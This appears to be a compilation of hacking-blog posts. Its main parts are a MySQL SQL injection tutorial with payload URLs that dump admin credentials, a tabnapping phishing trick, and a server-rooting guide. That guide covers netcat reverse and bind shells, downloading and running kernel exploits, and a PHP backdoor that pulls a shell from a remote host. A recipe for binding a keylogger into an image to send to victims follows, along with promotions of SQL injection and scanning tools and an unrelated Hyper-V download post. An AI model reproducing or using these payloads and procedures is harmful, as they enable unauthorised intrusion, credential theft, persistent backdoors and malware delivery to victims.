Exploit Development

Using Enviormental Variables for Stack Exploitation

Code:

http://blip.tv/episode/5691672

http://blip.tv/episode/5691736

SQL INJECTION (ERROR BASED)

SQL Injection Tutorial (MySQL)

In this tutorial i will describe how sql injection works and how touse it to get some useful information.

First of all: What is SQL injection?

It’s one of the most common vulnerability in web applications today.It allows attacker to execute database query in url and gain accessto some confidential information etc…(in shortly).

1.SQL Injection (classic or error based or whatever you call it)  

2.Blind SQL Injection (the harder part)

So let’s start with some action  

1). Check for vulnerability

Let’s say that we have some site like this

http://www.site.com/news.php?id=5

Now to test if is vulrnable we add to the end of url ‘ (quote),

and that would be http://www.site.com/news.php?id=5′

so if we get some error like“You have an error in your SQL syntax; check the manual that corresponds to your 

MySQL server version for the right etc..."or something similar

that means is vulrnable to sql injection  

2). Find the number of columns

To find number of columns we use statement ORDER BY (tells database how to order

the result)

so how to use it? Well just incrementing the number until we get an error.

http://www.site.com/news.php?id=5 order by 1/* <– no error

http://www.site.com/news.php?id=5 order by 2/* <– no error

http://www.site.com/news.php?id=5 order by 3/* <– no error

http://www.site.com/news.php?id=5 order by 4/* <– error (we get message

like this Unknown column '4' in 'order clause' or something like that)

that means that the it has 3 columns, cause we got an error on 4.

3). Check for UNION function

With union we can select more data in one sql statement.

so we have

http://www.site.com/news.php?id=5 union all select 1,2,3/* (we already found

that number of columns are 3 in section 2). )

if we see some numbers on screen, i.e 1 or 2 or 3 then the UNION works  

4). Check for MySQL version

http://www.site.com/news.php?id=5 union all select 1,2,3/* NOTE: if /* not 

working or you get some error, then try --it’s a comment and it’s important for our query to work properly.

let say that we have number 2 on the screen, now to check for versionwe replace the number 2 with @@version or version() and get someting like 

4.1.33-log or 5.0.45 or similar.

it should look like this http://www.site.com/news.php?id=5 union all select 

1,@@version,3/*

if you get an error “union + illegal mix of collations (IMPLICIT + COERCIBLE) …”

i didn’t see any paper covering this problem, so i must write it  

what we need is convert() function

i.e.

http://www.site.com/news.php?id=5 union all select 1,convert(@@version using latin1)

,3/*

or with hex() and unhex()

i.e.

http://www.site.com/news.php?id=5 union all select 1,unhex(hex(@@version)),3/*

and you will get MySQL version  

5). Getting table and column name

well if the MySQL version is < 5 (i.e 4.1.33, 4.1.12…) <— later i 

will describe for MySQL > 5 version.we must guess table and column name in most cases.

common table names are: user/s, admin/s, member/s …

common column names are: username, user, usr, user_name, password, pass, passwd, 

pwd etc...

i.e would be

http://www.site.com/news.php?id=5 union all select 1,2,3 from admin/* 

(we see number 2 on the screen like before, and that's good  )

we know that table admin exists…

now to check column names.

http://www.site.com/news.php?id=5 union all select 1,username,3 from admin/* 

(if you get an error, then try the other column name)

we get username displayed on screen, example would be admin, or superadmin etc…

now to check if column password exists

http://www.site.com/news.php?id=5 union all select 1,password,3 from admin/* 

(if you get an error, then try the other column name)

we seen password on the screen in hash or plain-text, it depends of how the 

database is set up  

i.e md5 hash, mysql hash, sha1…

now we must complete query to look nice  

for that we can use concat() function (it joins strings)

i.e

http://www.site.com/news.php?id=5 union all select 1,concat(username,0×3a,password),3

from admin/*

Note that i put 0×3a, its hex value for : (so 0×3a is hex value for colon)

(there is another way for that, char(58), ascii value for : )

http://www.site.com/news.php?id=5 union all select 1,concat(username,char(58),

password),3 from admin/*

now we get dislayed username:password on screen, i.e admin:admin or admin:somehash

when you have this, you can login like admin or some superuser  

if can’t guess the right table name, you can always try mysql.user (default)

it has user i password columns, so example would be

http://www.site.com/news.php?id=5 union all select 1,concat(user,0×3a,password)

,3 from mysql.user/*

6). MySQL 5

Like i said before i’m gonna explain how to get table and column namesin MySQL > 5.

For this we need information_schema. It holds all tables and columns

in database.

to get tables we use table_name and information_schema.tables.

i.e

http://www.site.com/news.php?id=5 union all select 1,table_name,3 

from information_schema.tables/*

here we replace the our number 2 with table_name to get the first

table from information_schema.tables

displayed on the screen. Now we must add LIMIT to the end of query to 

list out all tables.

i.e

http://www.site.com/news.php?id=5 union all select 1,table_name,3 

from information_schema.tables limit 0,1/*

note that i put 0,1 (get 1 result starting from the 0th)

now to view the second table, we change limit 0,1 to limit 1,1

i.e

http://www.site.com/news.php?id=5 union all select 1,table_name,3

from information_schema.tables limit 1,1/*

the second table is displayed.

for third table we put limit 2,1

i.e

http://www.site.com/news.php?id=5 union all select 1,table_name,3

from information_schema.tables limit 2,1/*

keep incrementing until you get some useful like db_admin, poll_user, auth,

auth_user etc...  

To get the column names the method is the same.

here we use column_name and information_schema.columns

the method is same as above so example would be

http://www.site.com/news.php?id=5 union all select 1,column_name,3 from 

information_schema.columns limit 0,1/*

the first column is diplayed.

the second one (we change limit 0,1 to limit 1,1)

ie.

http://www.site.com/news.php?id=5 union all select 1,column_name,3 from 

information_schema.columns limit 1,1/*

the second column is displayed, so keep incrementing until you get something like

username,user,login, password, pass, passwd etc…  

if you wanna display column names for specific table use this query. (where clause)

let’s say that we found table users.

i.e

http://www.site.com/news.php?id=5 union all select 1,column_name,3 from

information_schema.columns where table_name='users'/*

now we get displayed column name in table users. Just using LIMIT we can list all columns in

table users.

Note that this won’t work if the magic quotes is ON.

let’s say that we found colums user, pass and email.

now to complete query to put them all together  

for that we use concat() , i decribe it earlier.

i.e

http://www.site.com/news.php?id=5 union all select 1,concat(user,0×3a,pass,0×3a,email)

from users/*

what we get here is user:pass:email from table users.

example: admin:hash:whatever@blabla.com

That’s all in this part, now we can proceed on harder part  

new phish trick

New Phising TabNapping And Hack Gmail Yahoo Facebook Orkut And Many More

Method:
How this is done:
It is done by checking wether your page is idle or not, if it is idle or not used for some particular time period
then it gets redirected:
Things to be done:
1.check for mouse movement
2.check for scroll bar movement
3.check for keystrokes

If any of the above event is not triggered till few seconds , this means user is not using that tab, either is off from system
or using other tab, so if these conditions are met, then we redirect it to our phished page, which user thinks it to be genuine
page.

Use This Script After Head

download script here

Official Free Download for Microsoft Hyper-V Server 2008 R2 ISO!

What is Microsoft Hyper-V Server?
Microsoft Hyper-V is a free hypervisor-based virtualization system for x86-x64 systems, and has been upgraded to R2 version, together with the RTM release of Windows Server 2008 R2. Codenamed Viridian and formerly known as Windows Server Virtualization, Hyper-V exists in two variants – standalone product named Microsoft Hyper-V Server 2008 R2 which is free, and as part of Windows Server 2008 R2. ( competetion for virtual box , vmware and xen )

New features of Hyper-V Server 2008 R2:

• Support for physical computers with up to 8 physical processors
• Support for using up to 1TB of physical memory (virtual machines can use up to 64GB each)
• Support for clustering
• Support for live migration
• Support for CPU Core Parking – Core Parking allows Windows and Hyper-V to consolidate processing onto the fewest number of possible processor cores, and suspends inactive processor cores.
• Support for Second Level Address Translation (SLAT) in CPUs – On Intel processors this is called “EPT” while AMD calls it “NPT”. SLAT adds a second level of paging below the architectural x86/x64 paging tables in x86/x64 processors, providing an indirection layer from virtual machine memory access to the physical memory access. In many virtualization scenarios, hardware based SLAT support can offer performance improvements.
• Support for VMQ, Jumbo Frames and other optimizations on networking
• The ability to hot add / remove SCSI virtual hard disks

Hyper-V Server 2008 R2 RTM supports the following guest operating system client and server:

• Windows Server 2008 R2
• Windows Server 2008 (x64 or x86)
• Windows Server 2003 (x86 or x64)
• Windows Server 2003 R2 (x86 or x64)
• Windows Server 2000
• SUSE Linux Enterprise Server 10 with SP1 or SP2 (x86 Edition or x64 Edition)
• SUSE Linux Enterprise Server 11 (x86 Edition or x64 Edition)
• Red Hat Enterprise Linux (RHEL) 5.2, 5.3 and 5.4 (x86 Edition or x64 Edition)
• Windows 7 (x86 Edition or x64 Edition)
• Windows Vista (x86 or x64)
• Windows XP Professional (x86 or x64)

Minimum system requirement:
Minimum CPU speed: 1.4 GHz; Recommended: 2 GHz or faster
RAM: Minimum: 1 GB RAM; Recommended: 2 GB RAM or greater (additional RAM is required for each running guest operating system); Maximum 1 TB
Available disk space: Minimum: 8 GB; Recommended: 20 GB or greater (additional disk space needed for each guest operating system)

Note: Hyper-V Server 2008 R2 is available in 64-bit edition only, so a x64 compatible processor with Intel VT or AMD-V technology enabled is required.

Direct download is also available just check “No I will register later” while downloading.

Click here to download.

MYSQL INJ3CT tutor

some few demanding questions by some ..made me take some few minutes to write it down..

a complete manual tutor on mysql injection sheets and technique..have fun 

click to read mysql inj3ct tutor

Admin directory finder by r00t40

This t00l was made by r00t40

download link

pass: root-team

Devilzc0desql (sql injection tool for mysql and mssql)

Devilzc0desql (sql injection tool for mysql and mssql)

Author: mywisdom

Tool name: devilzc0desql.py version 1.0
Download url: click me
Programmer: mywisdom (antonsoft_2004@yahoo.com)
Requirement(s): python, php (with curl library installed) and perl

Ok guys welcome to new product from Devilzc0de, this time we dedicate this all in one sql injection tool for you.
So. what is devilzc0desql? this is a very sophisticated sql injection tool for mysql injection, mssql injection and ms access (jet oledb) sql injection.</p>

If you don’t have php, perl and python you need to install them in order to run this tool properly. Then you must set php,perl and python to run globally from your command prompt or shell.

XSS INJECTION { cross scripting}

In general, cross-site scripting refers to that hacking technique that leverages vulnerabilities in the code of a web application to allow an attacker to send malicious content from an end-user and collect some type of data from the victim.

Today, websites rely heavily on complex web applications to deliver different output or content to a wide variety of users according to set preferences and specific needs. This arms organizations with the ability to provide better value to their customers and prospects. However, dynamic websites suffer from serious vulnerabilities rendering organizations helpless and prone to cross site scripting attacks on their data.

“A web page contains both text and HTML markup that is generated by the server and interpreted by the client browser. Web sites that generate only static pages are able to have full control over how the browser interprets these pages. Web sites that generate dynamic pages do not have complete control over how their outputs are interpreted by the client. The heart of the issue is that if mistrusted content can be introduced into a dynamic page, neither the web site nor the client has enough information to recognize that this has happened and take protective actions.” (CERT Coordination Center).

Cross Site Scripting allows an attacker to embed malicious JavaScript, VBScript, ActiveX, HTML, or Flash into a vulnerable dynamic page to fool the user, executing the script on his machine in order to gather data. The use of XSS might compromise private information, manipulate or steal cookies, create requests that can be mistaken for those of a valid user, or execute malicious code on the end-user systems. The data is usually formatted as a hyperlink containing malicious content and which is distributed over any possible means on the internet.

As a hacking tool, the attacker can formulate and distribute a custom-crafted CSS URL just by using a browser to test the dynamic website response. The attacker also needs to know some HTML, JavaScript and a dynamic language, to produce a URL which is not too suspicious-looking, in order to attack a XSS vulnerable website.

Any web page which passes parameters to a database can be vulnerable to this hacking technique. Usually these are present in Login forms, Forgot Password forms, etc…

N.B. Often people refer to Cross Site Scripting as CSS or XSS, which is can be confused with Cascading Style Sheets (CSS).

Is your site vulnerable to Cross Site Scripting
Our experience leads us to conclude that the cross-site scripting vulnerability is one of the most highly widespread flaw on the Internet and will occur anywhere a web application uses input from a user in the output it generates without validating it. Our own research shows that over a third of the organizations applying for our free audit service are vulnerable to Cross Site Scripting. And the trend is upward.

Example of a Cross Site Scripting attack
As a simple example, imagine a search engine site which is open to an XSS attack. The query screen of the search engine is a simple single field form with a submit button. Whereas the results page, displays both the matched results and the text you are looking for.

Example:
Search Results for “XSS Vulnerability”

To be able to bookmark pages, search engines generally leave the entered variables in the URL address. In this case the URL would look like:

http://test.searchengine.com/search.php?q=XSS%20

Vulnerability

Next we try to send the following query to the search engine:

<script type=”text/javascript”> alert(’This is an XSS Vulnerability’) </script>

By submitting the query to search.php, it is encoded and the resulting URL would be something like:

http://test.searchengine.com/search.php?q=%3Cscript%3

Ealert%28%91This%20is%20an%20XSS%20Vulnerability%92%2

9%3C%2Fscript%3E

Upon loading the results page, the test search engine would probably display no results for the search but it will display a JavaScript alert which was injected into the page by using the XSS vulnerability.

How to check for Cross site scripting vulnerabilities
To check for Cross site scripting vulnerabilities, use a Web Vulnerability Scanner. A Web Vulnerability Scanner crawls your entire website and automatically checks for Cross Site Scripting vulnerabilities. It will indicate which URLs/scripts are vulnerable to these attacks so that you can fix the vulnerability easily. Besides Cross site scripting vulnerabilities a web application scanner will also check for SQL injection & other web vulnerabilities.

Spiderpig: A PDF JavaScript Fuzzer!

Adobe and Portable Document Format (PDF) vendors use JavaScript in their PDF formats to enhance standard work-flow for example connecting to database, spell checking, printing n viewing etc. When we open a PDF in say Adobe Reader, it executes this JavaScript code. So, the goal of Spiderpig is to find bugs in the PDF reader’s JavaScript engine.

Spiderpig reads the methods prototype from an input file and creates a PDF file and creates a stream of javascript code and then this stream is then added into PDF file using the makepdf module. In many PDF fuzzers that are out there on world-wide-web are file format fuzzers which try to fuzz the Adobe’s file format implementation. we didn’t discover a single fuzzer which fuzzes Adobe’s JavaScript implementation, so on those lines, we now have Spiderpig a JavaScript fuzzer for PDF file format which tries to screw up PDF reader utilizing JavaScript methods. Spiderpig uses bruteforce method to abuse reader, creating methods that use all range of evil parameters possible!

As fuzzer’s are very helpful in finding bugs and errors this one is specifically for PDF. There are other tools also which do the same things, which we have discussed earlier. This one targets only javascript engine of the reader. The source file contains a few hard-coded instructions that aide the fuzzer, which can be changed if you stumble upon something. That’s something we have always appreciated about open source applications.

Operating systems supported:

Currently supports all operating systems that allow you to use Python.

Download Spiderpig here

Robo_ex sql exploiter

This is a list of the available features:

• Full support for GET/Post/Cookie Injection
• Full support for HTTP Basic, Digest, NTLM and Certificate authentications
• Full support for MySQL, Oracle, PostgreSQL,MSSQL,ACESS,DB2,Sybase,Sqlite
• Full support for Error/Union/Blind/Force SQL injection
• Support for file acess,command execute,ip domain reverse,web path guess,md5 crack,etc.
• Super bypass WAF

one of the most powerful penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of back-end database servers…

download demo version of this amazing tool here

for lincensing of this great exploiter pm me on yahoo..and ill been adding demo version and video soon..

Rooting basics

[ Gaining Root Access ]
[ The Basics of rooting a server ]

[x] What would I expect from this tutorial?

- This tutorial is to show you the easy ways of gaining root access to a *nix server.
most people think its quiet hard to do so, well I am trying to prove the opposite.

[x] I am interested, go on…

- Okay, you should know atleast some basics of webhacking, to gain access to the server you want to root.
if you have no idea, or never gained access to a server before, I suggest you read some WebHacking tutorials.

I will start with some of the things you need to know in order to start rooting servers::

- Using a shell, have a good background on *nix commands, and know your way around a *nix server.
[ You can learn all that locally, by just installing a *nix distro, and playing around with it. ]
- How to use NetCat, and listen / connect to servers using it.
[ I will cover that in this tutorial ]
- as mentioned earlier, you must have atleast the basics of webhacking covered, how to gain access to a server. etc..
[ Read some WebHacking tutorials, I made a very basic one with alot of examples covering the most used attacking vectors ]

Those are the basic requriements that you should cover before starting reading this tutorial, if you feel you got one missing, lookup some tutorials on it, or you can ask me

[x] How much access you have?

- You cant just root a server if you have a XSS on that server, unless you take that XSS to the extreme and phish with it, but thats another story.
so, we need atleast ability to upload / download / include our code, or even just exeucute it.

Once we got the ability to execute commands on that server, we start checking for things, this is my own checklist that I do on every server. its just a habit now::

Check the /etc/passwd file for the users with SSH access, how do I know which have and which does not?
simple, by using `cat` to get the contents of that file, you will see the users on the server in this form:

user:*:501:502:x:/home/user:/bin/bash
[1] [2] [3]

[1] - The usersname | good for us to know the user to be used on cPanels, FTPs, and SSH…

[2] - Home of that username | good for cross server hacks, where you need to get to that users files.

[3] - Shell access | If it was anything other than :

Quote

/bin/sh
/bin/bash
/bin/zsh

Most probably it means no shell / SSH access for that user.

Now, why are we looking for users with SSH access?

Because it would make it much easier to work on that server with SSH access, to execute commands faster etc..

Now lets say the user `user` got SSH access, we can go to his `home` and look for config files, passwords, backups, anything that will have a password.

and then try it on SSH, with the user `user` and the pass that we found, if you are lucky, you will get access

[ Not going to explain what to do next, cause we still need to complete the checklist ]

Allright, so none of the users got SSH access… we cant just give up now can we?

If the hosting company is not that big, or if it was a private server, VPS, dedicated server, most likely the main site of the hosting is on the same server…

that is a great thing to have, so we do a simple WHOIS on the server, and check out the host, and then try to find the home dir…

Now most hosting, will have a billing software, or some system check panels, etc. all of those needs a high user access to the server, so in most cases you will find the password of admin access in plaintext,

we will be looking for config files, how to do so?

well, we moved to the hosts home right, lets check there files…

by listing the files there, we can see they have a folder called `billing`, lets check that out…

the first step, is to get the contents of the index, and look for the included files, most cases its just clear that this file is a config file from the name.

it will be something like:

<?php include('config.php'); ?>

or

<?php include('connection/db.php'); ?>

or

<?php include('includes/conf.php'); ?>

by getting the contents of that file, we can get the password, and try it on that user, on SSH, cPanel, FTP.

[ No luck… next… ]

The hosting company has there files on another server, there are no backups whatsoever, and you are getting desprete by now…

NetCat comes to the rescue!, NetCat the TCP/IP swiss army knife should be always in your pocket `flash drive or whatever you use`, it is very usefull..

as I promised, I will explain about the usage of NetCat.. so here we go::

[ Windows ]

After downloading NetCat, open up your CMD, and move to the dir that it is located.

The commands you would need are:

nc -vv -l -p 5555

This will make NetCat listen on port 5555, verbosely `telling you exactly what is going on`. that simple eh?

nc -vv -L -p 5555

Same thing, but with a capital L, makes it listen and once disconnected, listen again, and again.. etc…

nc darkmindz.com 80

Connect to darkmindz.com on port 80.

nc -vv -l -p 5555 -e cmd.exe

Okay, you dont want to do that on your own PC, this would listen on port 5555, and once someone connects, it would open up cmd for them…

[ Thats all you need to know about NetCat for now ]

[ *nix ]

Downloaded NetCat, compiled it, and ready to go…

same commands, now the only difference is, since most webservers are *Nix, you will need to use it as a `backdoor`, by using this command:

./nc -vv -l -p 5555 -e /bin/bash

once connected, you got a bash command line on that server

allright, where does that leaves us.. we still need to get a better way to execute commands on the server, and all our trials to get SSH access failed…

Now we are going to move into, Backconnecting and Backdooring…

[ Backconnecting ]

A simple definition would be:

Making the server connect to you.

Limitations:

If the server was firewalled, or had some kind of security against remote connections, you cant use that method…

How-To:

Well, you can code your own backconnector, it is not that hard, if you know C or Perl. but if you dont, you can always use the lots of backconnectors out there.

The most used tool, `atleast by me`, is the iranian backconnnector, and the cyberlab. both are in perl, and both work like a charm.

ofcourse perl should be installed on that server to be able to use those, if perl is installed, all you need to do is::

use NetCat on your PC to listen to a port…

nc -vv -l -p 5555

then, on that server, follow the instructions of your backconnector, most likely it is::

perl shos.pl your_ip_here 5555

if it connected, you will see it on your screen, saying connected, and you can start executing commands

otherwise, you can try a C backconnect tool.. same concept, just compile and run…

[ Backdooring ]

Backdooring, is opening a port on the server, to connect to…

You can use NetCat in this case, and run the command:

./nc -vv -l -p 5555 -e /bin/bash

then connect to the server using NetCat.. done..

or use some bind shells, wont work on alot of servers, they started banning the process… but if it works, great!

[x] So, we have been talking about how to get more access to execute commands all day now, whats next?!

Right, so backups were not found, host is not on the same server, and if it was, all the passwords are either invalid or encrypted.

Now we move into some kernel exploits, and using the server to the max.

atleast by now, you should have a command line access, SSH, Backconnect, Backdoor, whatever it was…

so now you can easily execute commands on the server, but what would you do exactly?

Now its time to get info on the server, kernel, processes, services, and then look for vulnerabilities.

we always start by the kernel, so get the kernel version by:

uname -a

it would output the hostname, OS, and then the kernel version, now we need to find an exploit for that kernel..

a good website for kernel exploits is: http://melol.free.fr/local/

lets say you found the kernel exploit, now we need to run it, how?

lets move to a dir that no one usually look in it, and that is /tmp/.

now, we are going to download that exploit, we can use wget for that:

wget http://melol.free.fr/local/the_name

if it says /bin/wget access denied, dont worry, we can always cURL:

curl http://melol.free.fr/local/the_name -o new_name

if that doesnt work either, remember your shell? well use it to upload that exploit in /tmp/.

before running it, check if its compiled or not, you can check that by viewing the source code.

if it was not compiled, `most probably the extension would be .c`, then you need to compile it:

gcc name.c -o new_name

now to run it, we first need to give it execution perms, so we chmod it to 777

chmod 777 new_name

allright, now lets hope this works and run it..

./new_name

you can check if it works by checking your id, or whoami, and if it says root. you are good to go

allright, we covered the basic basics of getting root on a server, rooting is not that hard, some attacking methods are hard, like BoF’s, you need C knowledge to be able to debug and exploit the processes…

[x] I dont want to loose the root!!

No one does, but alot makes stupid mistakes that will take the root away from them…

Rule #1 and the most important is : You NEVER change the roots pass, NEVER EVER!

Create a new user, with SSH access. check the useradd command for more info.

If you used a local root exploit, make sure you have other copies of it on that server, you might need it again.

Backdoor every single site on the server, with a simple PHP-Shell backdoor:

<?php $config_x = $_SERVER['HTTP_USER_AGENT']; if($config_x == "myb4ckd00r") { @include('http://www.darkmindz.com/shell/x2300.txt'); } ?>

Use bind shell backdoors too, you can download a good collection of backdoors from DarkMindZ.com.

The backdoors will need you to compile them, and that is a general *nix knowledge, so if you still dont know how to use them, you are not ready to start rooting. until you know your way around *nix.

This is the end of this tutorial, I hope you liked it

mySQLenum – Automatic blind sql injection tool

mySQLenum is a command line automatic blind sql injection tool for web application that uses MySql server as its back-end. Its main goal is to provide an easy to use command line interface.

Coded in pure c, does not depends on external library, is fast and support all MySQL versions.

It is easy and simple to use, all web application develops who use database can use this tool to simply run and find known vulneability.

Click this bar to view the full image.

Five necessary parameters:

–url: target URL
–sql-query: sql query to execute (or –macro to enter in Macro mode)
–param: vulnerable parameter
–param-value: a valid value to assign to parameter
–match-string: string to match in page content when the query is valid

How to use mySQLenum

mysqlenum –url=”http://www.oneexample.com/page.php” –sql-query=”select username from users” –param=page_id –param-value=1 –match-string=”Articolo 22″ –http-auth=”user:P4ssw0rd”

Query: select username from users

1) root
2) local
3) marco
4) luca
5) —

> Total requests: 192
> Data sent: 40 Kb
> Data received: 862 Kb

When above five parameter is not provided it automaticaly assumes.

- the request type is GET
- the webserver port is 80
- the charset used during the enumeration is included between – the ASCII values 32 and 122

we can use the CONCAT function to enumerate more fields with only one query:

One more macro mode example.

interactive Macro mode is possible to automatically enumerate:

- all available databases
- all tables of a specific database
- all fields of a specific table

the macro mode requires that the INFORMATION_SCHEMA is accessible.

mysqlenum –url=”http://www.example.com/page.php” –macro –param=page_id –param-value=1 –match-string=”Articolo 22″

Available macros:
1) Databases enumeration
2) Tables enumeration
3) Fields enumeration

Your choice: X

Databases:
1) information_schema
2) site
3) —

> Total requests: 227
> Data sent: 62 Kb
> Data received: 1066 Kb

Operating system supported

*nix Systems

Download mysqlenum Here

image + keylogger

To bind any file to an image:
1- make a folder on the C drive (C:\test)
2- move the files you want to bind (keylogger.exe) and the image (sexy_girl.jpg) to the folder created
3- add the files you want to bind (keylogger.exe) to a rar archive (keylogger.rar) (you need winrar)
4- Run the cmd and type the following:
cd.. (enter)
cd.. (enter) (to get to the C drive)
cd test (or the folder you’re working on) (enter)
copy /b sexy_girl.jpg + kelogger.rar sexy_girl_result.jpg

Now You should get a confirmation message
5- That’s it, close the cmd and your keylogger image is now sexy_girl_result.jpg
You can rename it and send it to the victim

WATOBO: The Web Application Toolbox!

Think web application penetration testing and tools like Burp Suite, Fiddler and the likes. Now, you can also start thinking of WATOBO, the Web Application Toolbox! Why, you will come to know as you read this write-up!

This tool was presented at the recently held OWASP-Stuttgart in April 2010! The Web Application Toolbox has been programmed in such a way so as to enable security professionals help perform highly efficient (semi-automated ) web application security audits. The author Mr. Andreas Schmidt, is convinced that the semi-automated approach is the best way to perform an accurate audit and to identify most of the vulnerabilities.
The working of this tool is similar to WebScarab, Paros or Burp in a sense. It has a good GUI and also supports a command line input. Also, since it is semi-automated, it does not actually need to be adjusted for optimum results and correctly configured. Human intervention will obviously do good over a completely automated process. It can perform two types of checks – active and passive. Passive checks analyze data for normal browsing, including but not limited to cookie security related operations. Active checks generate questions that can be used for while say – SQL injection checks or other checks. Other than these, no additional requests are sent to the application!

What really bought us in for this tool is session-management which any free tool lacks! Burp Professional has it, but it is not free. The same with NetSparker. Also, these tools often have only limited automated functions. Customizing paid tools is not easy either. Not this one. Another good thing about this tool is that it can be quickly adapted to new requirements. In short with this tool, you can enjoy benefits of both worlds manual and automatic tools combined!

Functions of WATOBO:

• Supports session management.
• Detects logout and automatically takes a re-login.
• Supports filter functions
• Inline-Encoder/Decoder
• Includes vulnerability scanner
• Quick-scan for targeted scanning a URL
• Full-scan to scan a whole session
• Manual request editor with special functions
• Session information is updated
• Login can be done automatically
• Transcoder
• URL, Base64, MD5, SHA-1
• Interceptor
• Fuzzer
• Free, Stable and Open source!
• Script code easy to understand
• Easy to extend / adapt
• In real-world scenarios tested and developed
• Speed / usability
• Active and Passive checks

A sample screen shot of the tool:

This tool has been programmed in FxRuby which some people might not be open to work with. It will support most Windows operating systems. *Nix compatibility has not been checked or verified by us. But, the language as such supports most *Nix flavours. Other than that, it is pretty much set to be one of the top free web assessment tool. Just look at the road map that the author has planned:

• Extension of check-modules – e.g. enumeration checks (directories, file extensions ,…)
• Integration of other open-source tools such as Nikto
• WebServices / SOAP support
• Expansion of the functions / GUI

At less than 300 KB download for this tool, you sure can give it a try just like we did and were VERY impressed by this tool. Download it’s current version, which was released about 20 hours ago – watobo version 0.9.1-95 here. A set of videos that deal with the application installation, use and performing a full scan can be found here.

Darkjumper – A scanner to check for SQL injection, LFI’s and RFI vulnerabilities!

Darkjumper is a tool that will try to find every website that host at the same server at your target Then check for every vulnerability of each website that host at the same server.

Functions of darkjumper:
1. User enumeration guessing based on 4-8 chars trial taken from every site name that host at the same server.
2. Scan for sql injection,local file inclusion,remote file inclusion and blind sql injection on every site at the same server.
3. CGI and Path Scanning.
4. Port-scanning
5. Auto-bruteforcing after user enumeration
6. Auto-injector – auto column finder (mysql) if found mysql bug found
7. Proxy added
8. Verbocity added
9. IP or proxy checker and GeoIP useful for checking your IP or your proxy work or not.

- Additional feature: More fake HTTP user agent (can be used for stress test or DDOS attacks)

It is written in Python. So, this tool can be used on any operating system that supports Python.

<a href=”http://www.burstnet.com/ads/ad20486a-map.cgi/ns/v=2.3S/sz=468×60B/” target=”_top”> <img src=”http://www.burstnet.com/cgi-bin/ads/ad20486a.cgi/ns/v=2.3S/sz=468×60B/” border=”0″ alt=”Click Here” title=”Darkjumper A scanner to check for SQL injection, LFIs and RFI vulnerabilities!” /></a>

Darkjumper can be used in six modes:
- reverseonly: Only reverse target no checking bug
- surface: Checking for sqli and blind sqli on every web that host at the same target server
- full: Checking for sqli,blind,rfi,lfi on every web that host at the same target server
- cgidirs: Scanning cgidirs on the target server
- enum [number]: Guessing possible user enumeration on server (4-8 chars user enumeration)
- portscan [startport]-[endport]: Scanning open port on server target

To stop the scan run this command:

killall -9 /usr/bin/python & killall -9 /usr/bin/perl

Download Darkjumper version 5.5here